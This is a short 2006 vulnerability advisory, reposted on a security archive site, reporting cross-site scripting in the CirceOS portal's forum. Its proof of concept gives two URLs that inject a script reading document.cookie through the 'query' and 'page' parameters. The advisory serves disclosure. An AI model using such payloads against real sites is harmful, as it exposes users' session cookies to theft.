Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA19870] Trac Wiki Macro Script Insertion Vulnerability

  [SA19849] Network Administration Visualized SQL Injection Vulnerability

  [SA19824] Phex Chat Request Handling Weakness

  [SA19843] Jax Guestbook "page" Cross-Site Scripting Vulnerability

From:outlaw_(at)_aria-security.net <outlaw_(at)_aria-security.net>
Date:28.04.2006
Subject:Cireos Portal Cross Site Scripting

#Aria-Security.net Advisory
#Discovered  by: O.u.t.l.a.w
#< www.Aria-security.net>
#Gr33t to: A.u.r.a  & R@1D3N & Smok3r
#-----------------------------------------------------------
Software: SirceOS Operative Solutions
Link: http://www.circeos.it
Attack method: Cross Site Scripting
advisory:http://www.aria-security.net/portal/circeos.txt

Summary:
cireos is a powerfull Portal and featuring a forum


Proof of Concept:
http://www.victim.com/circeos_path/forum/buscar.php?query=<script>alert(
document.cookie)</script><!--
www.site.com/path/index.php?page=<script>alert(document.
cookie)</script><!--

Tested On
http://www.circeos.it/forum/index.php

Solution
contact me: Advisory@Aria-Security.net


About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru